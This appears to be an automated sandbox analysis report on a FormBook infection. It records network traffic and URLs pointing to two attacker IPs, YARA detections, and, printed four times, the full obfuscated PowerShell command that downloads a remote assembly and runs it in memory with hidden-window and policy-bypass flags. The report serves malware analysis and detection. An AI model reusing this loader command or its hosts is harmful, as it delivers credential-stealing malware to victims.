Source: unknown TCP traffic detected without corresponding DNS query: 20.106.232.4
Source: unknown TCP traffic detected without corresponding DNS query: 20.106.232.4
Source: unknown TCP traffic detected without corresponding DNS query: 20.106.232.4
Source: unknown TCP traffic detected without corresponding DNS query: 20.106.232.4
Source: unknown TCP traffic detected without corresponding DNS query: 20.106.232.4
Source: unknown TCP traffic detected without corresponding DNS query: 20.106.232.4
Source: unknown TCP traffic detected without corresponding DNS query: 20.106.232.4
Source: unknown TCP traffic detected without corresponding DNS query: 20.106.232.4
Source: unknown TCP traffic detected without corresponding DNS query: 20.106.232.4
Source: unknown TCP traffic detected without corresponding DNS query: 20.106.232.4
Source: unknown TCP traffic detected without corresponding DNS query: 20.106.232.4
Source: unknown TCP traffic detected without corresponding DNS query: 20.106.232.4
Source: unknown TCP traffic detected without corresponding DNS query: 20.106.232.4
Source: unknown TCP traffic detected without corresponding DNS query: 20.106.232.4
Source: unknown TCP traffic detected without corresponding DNS query: 20.106.232.4
Source: unknown TCP traffic detected without corresponding DNS query: 20.106.232.4
Source: unknown TCP traffic detected without corresponding DNS query: 20.106.232.4
Source: unknown TCP traffic detected without corresponding DNS query: 20.106.232.4
Source: unknown TCP traffic detected without corresponding DNS query: 20.106.232.4
Source: unknown TCP traffic detected without corresponding DNS query: 20.106.232.4
Source: unknown TCP traffic detected without corresponding DNS query: 20.106.232.4
Source: unknown TCP traffic detected without corresponding DNS query: 20.106.232.4
Source: unknown TCP traffic detected without corresponding DNS query: 20.106.232.4
Source: unknown TCP traffic detected without corresponding DNS query: 20.106.232.4
Source: unknown TCP traffic detected without corresponding DNS query: 20.106.232.4
Source: unknown TCP traffic detected without corresponding DNS query: 20.106.232.4
Source: unknown TCP traffic detected without corresponding DNS query: 20.106.232.4
Source: unknown TCP traffic detected without corresponding DNS query: 20.106.232.4
Source: unknown TCP traffic detected without corresponding DNS query: 20.106.232.4
Source: unknown TCP traffic detected without corresponding DNS query: 20.106.232.4
Source: unknown TCP traffic detected without corresponding DNS query: 20.106.232.4
Source: unknown TCP traffic detected without corresponding DNS query: 20.106.232.4
Source: unknown TCP traffic detected without corresponding DNS query: 20.106.232.4
Source: unknown TCP traffic detected without corresponding DNS query: 20.106.232.4
Source: unknown TCP traffic detected without corresponding DNS query: 20.106.232.4
Source: unknown TCP traffic detected without corresponding DNS query: 20.106.232.4
Source: unknown TCP traffic detected without corresponding DNS query: 20.106.232.4
Source: unknown TCP traffic detected without corresponding DNS query: 20.106.232.4
Source: unknown TCP traffic detected without corresponding DNS query: 20.106.232.4
Source: powershell.exe, 00000006.00000002.490975728.0000012FC8CA5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://2.5
Source: powershell.exe, 00000006.00000002.490975728.0000012FC8CA5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://2.56.57.22
Source: powershell.exe, 00000006.00000002.490975728.0000012FC8CA5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://2.56.57.22/ts
Source: powershell.exe, 00000006.00000002.483842645.0000012FC8286000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.490975728.0000012FC8CA5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://2.56.57.22/tsdfguhijk.txt
Source: powershell.exe, 00000006.00000002.483842645.0000012FC8286000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://2.56.57.22x
Source: powershell.exe, 00000006.00000002.490800447.0000012FC8C83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.483072450.0000012FC80F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.106.232.4
Source: powershell.exe, 00000006.00000002.484659437.0000012FC8416000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.106.232.4/dll/26-05-2022-StartUp.pdf
Source: powershell.exe, 00000006.00000002.483072450.0000012FC80F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.106.232.4/dll/26-05-2022-StartUp.pdfPk
Source: powershell.exe, 00000006.00000002.490975728.0000012FC8CA5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.106.232.4/rumpe/26-05-2022-StartUp.pdf
Source: powershell.exe, 00000006.00000002.490975728.0000012FC8CA5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://20.106.232.48
Source: powershell.exe, 00000006.00000003.478394040.0000012FDFF82000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.503288727.0000012FDFF82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://20.6.
Source: powershell.exe, 00000004.00000002.514247971.000001A563378000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.503131093.0000012FDFF07000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.492751855.000001C7C7233000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000006.00000002.495224431.0000012FD7F45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.490798860.000001C7BF161000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000007.00000002.479916206.000001C7AF301000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.510984736.000001A54B2E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.480982102.0000012FC7EE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.478703723.000001C7AF0F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000007.00000002.479916206.000001C7AF301000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000007.00000002.490798860.000001C7BF161000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000007.00000002.490798860.000001C7BF161000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000007.00000002.490798860.000001C7BF161000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000007.00000002.479916206.000001C7AF301000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000006.00000002.495224431.0000012FD7F45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.490798860.000001C7BF161000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown DNS traffic detected: queries for: www.nancykmorrison.store
Source: global traffic HTTP traffic detected: GET /dll/26-05-2022-StartUp.pdf HTTP/1.1Host: 20.106.232.4Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /rumpe/26-05-2022-StartUp.pdf HTTP/1.1Host: 20.106.232.4
Source: global traffic HTTP traffic detected: GET /tsdfguhijk.txt HTTP/1.1Host: 2.56.57.22Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /dll/26-05-2022-StartUp.pdf HTTP/1.1Host: 20.106.232.4Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /rumpe/26-05-2022-StartUp.pdf HTTP/1.1Host: 20.106.232.4
Source: global traffic HTTP traffic detected: GET /tsdfguhijk.txt HTTP/1.1Host: 2.56.57.22Connection: Keep-Alive

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 9.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000002.956304495.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.503018278.0000012FD8224000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.593036972.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.573682986.0000000000E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.468889612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.552581892.000000000F00A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.522677927.000000000F00A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.955473010.00000000009F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.610838072.00000282491DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.502402216.0000012FD8108000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000000.588308493.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 9.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.powershell.exe.12fc82bf280.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects known downloader agent Author: ditekSHen
Source: 6.2.powershell.exe.12fc8d3c6d8.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects known downloader agent Author: ditekSHen
Source: 9.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 24.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 24.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.powershell.exe.12fe0190000.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects known downloader agent Author: ditekSHen
Source: 21.2.powershell.exe.28251060000.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects known downloader agent Author: ditekSHen
Source: 24.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 24.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 24.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 24.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 24.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 24.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 24.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 24.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 24.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 24.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 21.2.powershell.exe.282392fdd48.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects known downloader agent Author: ditekSHen
Source: 24.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 24.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 21.2.powershell.exe.282396edb80.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects known downloader agent Author: ditekSHen
Source: 00000017.00000002.956304495.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000017.00000002.956304495.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.503018278.0000012FD8224000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.503018278.0000012FD8224000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000018.00000002.593036972.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000018.00000002.593036972.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.573682986.0000000000E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.573682986.0000000000E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000000.468889612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000000.468889612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.503455529.0000012FE0190000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects known downloader agent Author: ditekSHen
Source: 0000000A.00000000.552581892.000000000F00A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000000.552581892.000000000F00A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000000.522677927.000000000F00A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000000.522677927.000000000F00A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000002.611974071.0000028251060000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects known downloader agent Author: ditekSHen
Source: 00000017.00000002.955473010.00000000009F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000017.00000002.955473010.00000000009F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000002.610838072.00000282491DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000002.610838072.00000282491DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.502402216.0000012FD8108000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.502402216.0000012FD8108000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: powershell.exe PID: 7076, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6384, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD Jump to behavior
Yara signature match
Source: 9.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.powershell.exe.12fc82bf280.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
Source: 6.2.powershell.exe.12fc8d3c6d8.2.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: 6.2.powershell.exe.12fc8d3c6d8.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
Source: 9.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
